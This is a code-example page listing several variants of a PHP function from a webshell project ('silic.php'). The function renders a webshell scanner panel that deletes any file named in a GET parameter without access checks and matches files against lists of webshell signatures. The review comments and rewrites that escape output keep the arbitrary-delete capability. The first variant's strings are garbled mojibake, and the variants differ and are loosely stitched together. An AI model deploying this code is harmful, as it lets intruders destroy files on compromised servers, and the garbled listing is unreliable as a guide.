示例#1
文件: silic.php 项目: evil7/webshell
/**
 * Request handler for the scanner panel of this script: delete a file, hand
 * off to the editor, or render the scan form and run a signature scan.
 *
 * Every action is driven by request parameters read straight from
 * $_GET / $_POST:
 *   - GET  df           : path handed to unlink(), retried after chmod 0666.
 *   - GET  fp, fn, dim  : forwarded unchanged to File_Edit() (not shown here).
 *   - POST sp           : directory to scan; also echoed back into the form.
 *   - POST stphp, stasx : select the PHP and/or ASP/ASPX signature set.
 *   - POST sb           : the value 'a' sets the 4th Antivirus_Auto() argument.
 *
 * NOTE(review): no authentication, authorisation, CSRF or path-confinement
 * check is visible in this function. Unless a caller enforces one, any client
 * that can reach the script can delete any file the PHP process may remove.
 * For responders, the parameter names above and the "?s=e" form action are
 * what to look for in web-server logs.
 *
 * NOTE(review): the non-ASCII string literals in this listing contain U+FFFD
 * replacement characters, so they were damaged by a lossy decode before they
 * reached this page. Treat the labels, messages and the one non-ASCII
 * signature value as unreliable.
 *
 * @return bool false after the delete or edit branch, true after the form
 *              (and optional scan) has been emitted.
 */
function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        // The raw parameter is written into the response without HTML
        // escaping, so markup in "df" is reflected to the browser.
        echo $_GET['df'];
        // A state-changing delete on a GET request; "@" hides any warning.
        if (@unlink($_GET['df'])) {
            echo 'ɾ���ɹ�';
        } else {
            // On failure the mode is loosened to 0666 and the delete retried.
            @chmod($_GET['df'], 0666);
            echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        // All three values go to File_Edit() unvalidated; what that helper
        // does with them is not visible in this block.
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }
    // Default scan root: the posted path if present, else File_Mode() (not shown).
    $SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
    // Signature tables, label => text fragment. They are handed to
    // Antivirus_Auto(), which is not shown, so the matching method is not
    // visible here. Fragments such as 'eval(' or 'base64_decode(' are broad
    // and presumably also occur in legitimate code.
    // NOTE(review): as printed, some labels repeat inside one array; in PHP a
    // later duplicate key overwrites the earlier value, which would silently
    // drop a signature. The damaged encoding makes it impossible to tell from
    // this listing alone which labels were distinct in the original file.
    $features_php = array('evalһ�仰����' => 'eval(', '����read����' => '->read()', '����readdir����3' => 'readdir(', 'MYSQL�Զ��庯������' => 'returns string soname', '��������1' => 'eval(gzinflate(', '��������2' => 'eval(base64_decode(', '��������3' => 'base64_decode(', 'evalһ�仰2' => 'eval (', 'php��������' => 'copy($_FILES', '��������2' => 'copy ($_FILES', '�ϴ�����' => 'move_uploaded_file($_FILES', '�ϴ�����2' => 'move_uploaded_file ($_FILES', 'С������' => 'str_replace(\'\\\\\',\'/\',');
    $features_asx = array('�ű�����' => 'VBScript.Encode', '��������' => '#@~^', 'fso����' => 'fso.createtextfile(path,true)', 'excuteһ�仰' => 'execute', 'evalһ�仰' => 'eval', 'wscript����' => 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B', '���ݿ���������' => '13709620-C279-11CE-A49E-444553540000', 'wscript����' => 'WScript.Shell', 'fso����' => '0D43FE01-F093-11CF-8940-00A0C9054228', 'ʮ������' => '����', 'aspx��������' => 'Process.GetProcesses', 'aspxһ�仰' => 'Request.BinaryRead');
    // $SCAN_DIR is interpolated into the value="" attribute below without
    // escaping, so a posted "sp" containing a double quote breaks out of it.
    print <<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">ɨ��·�� <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">ľ������ <input type="checkbox" name="stphp" value="php" checked>phpľ��
<input type="checkbox" name="stasx" value="asx">asp+aspxľ��</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>��ɨ��Ӧ���ڸ��ļ���,���ļ��к��ļ�
<br><input type="radio" name="sb" value="b">����ɨ��Ӧ���ڸ��ļ���</div>
<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
</form>
END;
    if (!empty($_POST['sp'])) {
        echo '<div class="actall">';
        // $st looks like a regex alternation over file-name suffixes (plus a
        // literal ';'); how it is applied is inside Antivirus_Auto() - confirm there.
        if (isset($_POST['stphp'])) {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\;';
        }
        if (isset($_POST['stasx'])) {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        if (isset($_POST['stphp']) && isset($_POST['stasx'])) {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        }
        // NOTE(review): when neither checkbox is posted, $features_all and $st
        // are never assigned and are used undefined in the call below; a
        // missing "sb" field is likewise read without an isset() check.
        $sb = $_POST['sb'] == 'a' ? true : false;
        echo Antivirus_Auto($_POST['sp'], $features_all, $st, $sb) ? 'ɨ������' : '�쳣��ֹ';
        echo '</div>';
    }
    return true;
}
示例#2
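/**
 * Request handler for the scanner panel: delete a file, hand off to the
 * editor, or render the scan form and run a signature scan.
 *
 * Request parameters, all read directly from $_GET / $_POST:
 *   - GET  df           : path handed to unlink(), retried after chmod 0666.
 *   - GET  fp, fn, dim  : forwarded unchanged to File_Edit() (not shown here).
 *   - POST sp           : directory to scan; echoed back into the form.
 *   - POST stphp, stasx : select the PHP and/or ASP/ASPX signature set.
 *   - POST sb           : 'a' sets the 4th Antivirus_Auto() argument to true.
 *
 * Changes against the listed version: request values are HTML-escaped before
 * they are written into the page, non-string parameters are rejected instead
 * of being passed to filesystem calls, a POST with neither signature set
 * selected no longer reads undefined variables, and a duplicated array key
 * that silently dropped one ASP signature is made unique.
 *
 * NOTE(review): no authentication, authorisation, CSRF or path-confinement
 * check is visible in this function, and the delete runs on a GET request.
 * That cannot be fixed inside this block without changing how callers link
 * to it. Unless a caller enforces access control, any client that can reach
 * the script can delete any file the PHP process may remove. The parameter
 * names above and the "?s=e" form action are the web-log indicators.
 *
 * @return bool false after the delete or edit branch, true after the form
 *              (and optional scan) has been emitted.
 */
function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        $target = $_GET['df'];
        if (!is_string($target)) {
            // An array-valued "df" cannot name a file; report failure rather
            // than hand a non-string to unlink()/chmod().
            echo '删除失败'; // "delete failed"
            return false;
        }
        // Escape before echoing: the raw value used to be reflected as HTML.
        echo htmlspecialchars($target, ENT_QUOTES);
        // "@" keeps filesystem warnings (and the paths in them) off the page.
        if (@unlink($target)) {
            echo '删除成功'; // "deleted"
        } else {
            // Original behaviour kept: loosen the mode to 0666 and retry once.
            @chmod($target, 0666);
            echo @unlink($target) ? '删除成功' : '删除失败';
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        // Forwarded unvalidated; what File_Edit() does with them is not
        // visible in this block.
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }

    $postedDir = isset($_POST['sp']) && is_string($_POST['sp']) ? $_POST['sp'] : null;
    $SCAN_DIR = $postedDir !== null ? $postedDir : File_Mode();
    // Escaped copy for the value="" attribute of the form below.
    $scanDirHtml = htmlspecialchars((string) $SCAN_DIR, ENT_QUOTES);

    // Signature tables, label => text fragment. How Antivirus_Auto() matches
    // a fragment is not shown here. Fragments such as 'eval(' or
    // 'base64_decode(' are broad and presumably also hit legitimate code.
    $features_php = array(
        'eval一句话特征' => 'eval(',
        '大马read特征' => '->read()',
        '大马readdir特征3' => 'readdir(',
        'MYSQL自定义函数语句' => 'returns string soname',
        '加密特征1' => 'eval(gzinflate(',
        '加密特征2' => 'eval(base64_decode(',
        '加密特征3' => 'base64_decode(',
        'eval一句话2' => 'eval (',
        'php复制特征' => 'copy($_FILES',
        '复制特征2' => 'copy ($_FILES',
        '上传特征' => 'move_uploaded_file($_FILES',
        '上传特征2' => 'move_uploaded_file ($_FILES',
        '小马特征' => 'str_replace(\'\\\\\',\'/\',',
    );
    $features_asx = array(
        '脚本加密' => 'VBScript.Encode',
        '加密特征' => '#@~^',
        'fso组件' => 'fso.createtextfile(path,true)',
        'excute一句话' => 'execute',
        'eval一句话' => 'eval',
        'wscript特征' => 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B',
        '数据库操作特征' => '13709620-C279-11CE-A49E-444553540000',
        // This label used to repeat 'wscript特征'. PHP keeps only the last
        // value for a repeated key, so the class-id entry above was lost.
        'wscript特征2' => 'WScript.Shell',
        'fso特征' => '0D43FE01-F093-11CF-8940-00A0C9054228',
        '十三函数' => '╋╁',
        'aspx大马特征' => 'Process.GetProcesses',
        'aspx一句话' => 'Request.BinaryRead',
    );

    print <<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">扫描路径 <input type="text" name="sp" id="sp" value="{$scanDirHtml}" style="width:600px;"></div>
<div class="actall">木马类型 <input type="checkbox" name="stphp" value="php" checked>php木马 
<input type="checkbox" name="stasx" value="asx">asp+aspx木马</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>将扫马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sb" value="b">仅将扫马应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;

    if ($postedDir !== null && !empty($postedDir)) {
        echo '<div class="actall">';
        $wantPhp = isset($_POST['stphp']);
        $wantAsx = isset($_POST['stasx']);
        // $st looks like a regex alternation over file-name suffixes (plus a
        // literal ';'); how it is applied is inside Antivirus_Auto() - confirm there.
        $features_all = null;
        $st = null;
        if ($wantPhp && $wantAsx) {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        } elseif ($wantAsx) {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
        } elseif ($wantPhp) {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\;';
        }
        if ($features_all === null) {
            // Neither checkbox posted: nothing to scan for, report an abort
            // instead of calling the scanner with undefined arguments.
            echo '异常终止'; // "aborted"
        } else {
            $sb = isset($_POST['sb']) && $_POST['sb'] === 'a';
            echo Antivirus_Auto($postedDir, $features_all, $st, $sb) ? '扫描完毕' : '异常终止';
        }
        echo '</div>';
    }
    return true;
}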
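/**
 * Scanner-panel request handler. Depending on the request it deletes a file,
 * hands off to the editor, or prints the scan form and runs a signature scan.
 *
 * Inputs (all taken directly from the request):
 *   - GET  df           : path handed to unlink(), retried after chmod 0666.
 *   - GET  fp, fn, dim  : forwarded unchanged to File_Edit() (not shown here).
 *   - POST sp           : directory to scan; echoed back into the form.
 *   - POST stphp, stasx : select the PHP and/or ASP/ASPX signature set.
 *   - POST sb           : 'a' sets the 4th Antivirus_Auto() argument to true.
 *
 * Compared with the listed version, request values are HTML-escaped before
 * being written into the page, non-string parameters are rejected before any
 * filesystem call, and a POST that selects no signature set reports an abort
 * instead of reading undefined variables.
 *
 * NOTE(review): this function shows no authentication, authorisation, CSRF or
 * path-confinement check, and the delete is triggered by a GET request. That
 * is a design problem this block cannot repair on its own. If no caller
 * enforces access control, any client that can reach the script can remove
 * any file the PHP process is allowed to delete. For log review, the
 * indicators are the parameter names above and the "?s=e" form action.
 *
 * @return bool false after the delete or edit branch, true otherwise.
 */
function Antivirus_e()
{
    $failedMsg = '删除失败';  // "delete failed"
    $deletedMsg = '删除成功'; // "deleted"

    if (!empty($_GET['df'])) {
        $path = $_GET['df'];
        if (is_string($path)) {
            // Escaped echo: the raw value was previously reflected as HTML.
            echo htmlspecialchars($path, ENT_QUOTES);
            // Warnings stay suppressed so server paths do not leak into the page.
            $removed = @unlink($path);
            if (!$removed) {
                // Original behaviour kept: loosen the mode to 0666, retry once.
                @chmod($path, 0666);
                $removed = @unlink($path);
            }
            echo $removed ? $deletedMsg : $failedMsg;
        } else {
            // An array-valued "df" cannot name a file.
            echo $failedMsg;
        }
        return false;
    }

    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        // Passed through unvalidated; File_Edit() is defined elsewhere.
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }

    $hasPostedDir = isset($_POST['sp']) && is_string($_POST['sp']);
    $SCAN_DIR = $hasPostedDir ? $_POST['sp'] : File_Mode();
    // Escaped copy for the value="" attribute of the form below.
    $scanDirHtml = htmlspecialchars((string) $SCAN_DIR, ENT_QUOTES);

    // Signature tables, label => text fragment, handed to Antivirus_Auto().
    // The matching method is not visible here. Short fragments such as
    // 'eval(' or 'readdir(' presumably also occur in legitimate code.
    $features_php = array(
        'php一句话特征' => 'eval(',
        'php大马特征2' => '->read()',
        'php大马特征3' => 'readdir(',
        '危险MYSQL语句4' => 'returns string soname',
        'php加密大马特征5' => 'eval(gzinflate(',
        'php加密大马特征6' => 'eval(base64_decode(',
        'php加密大马特征7' => 'base64_decode(',
        'php一句话特征8' => 'eval (',
        'php上传后门特征9' => 'copy($_FILES',
        'php上传后门特征10' => 'copy ($_FILES',
        'php上传后门特征11' => 'move_uploaded_file($_FILES',
        'php上传后门特征12' => 'move_uploaded_file ($_FILES',
        'php小马特征13' => 'str_replace(\'\\\\\',\'/\',',
    );
    $features_asx = array(
        'asp小马特征1' => '绝对路径',
        'asp小马特征2' => '挂马',
        'asp小马特征3' => 'fso.createtextfile(path,true)',
        'asp一句话特征4' => '<%execute(request',
        'asp一句话特征5' => '<%eval request',
        'asp一句话特征6' => 'execute session(',
        'asp数据库后门特征7' => '--Created!',
        'asp大马特征8' => 'WScript.Shell',
        'asp加密特征' => '<%@ LANGUAGE = VBScript.Encode %>',
        'aspx大马特征10' => 'www.rootkit.net.cn',
        'aspx大马特征11' => 'Process.GetProcesses',
        'aspx大马特征12' => 'lake2',
    );

    print <<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">扫描路径 <input type="text" name="sp" id="sp" value="{$scanDirHtml}" style="width:600px;"></div>
<div class="actall">木马类型 <input type="checkbox" name="stphp" value="php" checked>php木马 
<input type="checkbox" name="stasx" value="asx">asp+aspx木马</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>将扫马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sb" value="b">仅将扫马应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;

    if (!$hasPostedDir || empty($_POST['sp'])) {
        return true;
    }

    echo '<div class="actall">';
    // The suffix patterns look like regex alternations over file-name
    // extensions (plus a literal ';'); confirm in Antivirus_Auto().
    $phpSuffixes = '\\.php|\\.inc|\\;';
    $asxSuffixes = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
    $bothSuffixes = '\\.php|\\.inc|\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\;';
    $usePhp = isset($_POST['stphp']);
    $useAsx = isset($_POST['stasx']);

    if (!$usePhp && !$useAsx) {
        // No signature set selected: report an abort instead of calling the
        // scanner with undefined arguments.
        echo '异常终止'; // "aborted"
    } else {
        if ($usePhp && $useAsx) {
            $features_all = array_merge($features_php, $features_asx);
            $st = $bothSuffixes;
        } elseif ($usePhp) {
            $features_all = $features_php;
            $st = $phpSuffixes;
        } else {
            $features_all = $features_asx;
            $st = $asxSuffixes;
        }
        // 'a' turns the scanner's fourth argument on (the form labels it as
        // including sub-folders).
        $sb = isset($_POST['sb']) && $_POST['sb'] === 'a';
        echo Antivirus_Auto($_POST['sp'], $features_all, $st, $sb) ? '扫描完毕' : '异常终止';
    }
    echo '</div>';
    return true;
}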
示例#4
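/**
 * Scanner-panel request handler (English-UI variant): deletes a file, hands
 * off to the editor, or prints the scan form and runs a signature scan.
 *
 * Inputs (all taken directly from the request):
 *   - GET  df          : path handed to unlink(), retried after chmod 0666.
 *   - GET  fp, fn, dim : forwarded unchanged to File_Edit() (not shown here).
 *   - POST sp          : directory handed to Antivirus_Auto().
 *   - POST st          : 'php', 'asx' or 'ppp' selects the signature set(s).
 *
 * Compared with the listed version, the deleted path and the default scan
 * directory are HTML-escaped before being written into the page, a non-string
 * "df"/"sp" is rejected before any filesystem or scanner call, and a missing
 * or unknown "st" reports 'Abort' instead of reading undefined variables.
 *
 * NOTE(review): this function shows no authentication, authorisation, CSRF or
 * path-confinement check, and the delete is triggered by a GET request. That
 * is a design problem this block cannot repair on its own. If no caller
 * enforces access control, any client that can reach the script can remove
 * any file the PHP process is allowed to delete. For log review, the
 * indicators are the parameter names above and the "?s=e" form action.
 *
 * @return bool false after the delete or edit branch, true otherwise.
 */
function Antivirus_e()
{
    if (!empty($_GET['df'])) {
        $path = $_GET['df'];
        // Runtime strings kept byte-for-byte, including the "faild" spelling.
        $okHtml = ' <font style=font:11pt color=ff0000>del successfully</font>';
        $failHtml = ' <font style=font:11pt color=ff0000>del faild</font>';
        if (!is_string($path)) {
            // An array-valued "df" cannot name a file.
            echo $failHtml;
            return false;
        }
        // Escaped echo: the raw value was previously reflected as HTML.
        echo htmlspecialchars($path, ENT_QUOTES);
        // Warnings stay suppressed so server paths do not leak into the page.
        if (@unlink($path)) {
            echo $okHtml;
        } else {
            // Original behaviour kept: loosen the mode to 0666, retry once.
            @chmod($path, 0666);
            echo @unlink($path) ? $okHtml : $failHtml;
        }
        return false;
    }
    if (!empty($_GET['fp']) && !empty($_GET['fn']) && !empty($_GET['dim'])) {
        // Passed through unvalidated; File_Edit() is defined elsewhere.
        File_Edit($_GET['fp'], $_GET['fn'], $_GET['dim']);
        return false;
    }

    // Default scan root: File_Mode() when non-empty, else this script's own
    // directory run through File_Str(). Both helpers are defined elsewhere.
    $SCAN_DIR = File_Mode() == '' ? File_Str(dirname(__FILE__)) : File_Mode();
    // Escaped copy for the value="" attribute of the form below.
    $scanDirHtml = htmlspecialchars((string) $SCAN_DIR, ENT_QUOTES);

    // Signature tables, label => text fragment, handed to Antivirus_Auto().
    // The matching method is not visible in this block.
    $features_php = array(
        'ftp.class.php' => 'ftp.class.php',
        'cha88.cn' => 'cha88.cn',
        'Security Angel Team' => 'Security Angel Team',
        'read()' => '->read()',
        'readdir' => 'readdir(',
        'return string soname' => 'returns string soname',
        'eval()' => 'eval(gzinflate(',
        'eval(base64_decode())' => 'eval(base64_decode(',
        'eval($_POST)' => 'eval($_POST',
        'eval($_REQUEST)' => 'eval($_REQUEST',
        'eval ($_)' => 'eval ($_',
        'copy()' => 'copy($_FILES',
        'copy ()' => 'copy ($_FILES',
        'move_uploaded_file()' => 'move_uploaded_file($_FILES',
        'move_uploaded_file ()' => 'move_uploaded_file ($_FILES',
        'str_replace()' => 'str_replace(\'\\\\\',\'/\',',
    );
    $features_asx = array(
        '绝对路径' => '绝对路径',
        '输入马的内容' => '输入马的内容',
        'fso.createtextfile()' => 'fso.createtextfile(path,true)',
        '<%execute(request())%>' => '<%execute(request',
        '<%eval request()%>' => '<%eval request',
        'execute session()' => 'execute session(',
        '--Created!' => '--Created!',
        'WScript.Shell' => 'WScript.Shell',
        '<%s LANGUAGE = VBScript.Encode %>' => '<%@ LANGUAGE = VBScript.Encode %>',
        'www.rootkit.net.cn' => 'www.rootkit.net.cn',
        'Process.GetProcesses' => 'Process.GetProcesses',
        'lake2' => 'lake2',
    );

    print <<<END
<div class="actall" style="height:100px;"><form method="POST" name="tform" id="tform" action="?s=e">
Path: <input type="text" name="sp" id="sp" value="{$scanDirHtml}" style="width:400px;">
<select name="st">
<option value="php">phpshell</option>
<option value="asx">aspshell+aspxshell</option>
<option value="ppp">phpshell+aspshell+aspxshell</option>
</select>
<input class="bt" type="submit" value="Scan">
</form><br>
END;

    if (!empty($_POST['sp'])) {
        $kind = isset($_POST['st']) && is_string($_POST['st']) ? $_POST['st'] : '';
        $features_all = null;
        $st = null;
        // The suffix patterns look like regex alternations over file-name
        // extensions (plus a literal ';'); confirm in Antivirus_Auto().
        if ($kind === 'php') {
            $features_all = $features_php;
            $st = '\\.php|\\.inc|\\.php4|\\.php3|\\._hp|\\;';
        } elseif ($kind === 'asx') {
            $features_all = $features_asx;
            $st = '\\.asp|\\.asa|\\.cer|\\.aspx|\\.ascx|\\.cdx|\\;';
        } elseif ($kind === 'ppp') {
            $features_all = array_merge($features_php, $features_asx);
            $st = '\\.php|\\.inc|\\.php4|\\.php3|\\._hp|\\.asp|\\.asa|\\.cer|\\.cdx|\\.aspx|\\.ascx|\\;';
        }
        if ($features_all === null || !is_string($_POST['sp'])) {
            // Unknown or missing selector, or a non-string path: report an
            // abort instead of calling the scanner with unusable arguments.
            echo 'Abort';
        } else {
            echo Antivirus_Auto($_POST['sp'], $features_all, $st) ? 'Done' : 'Abort';
        }
    }
    echo '</div>';
    return true;
}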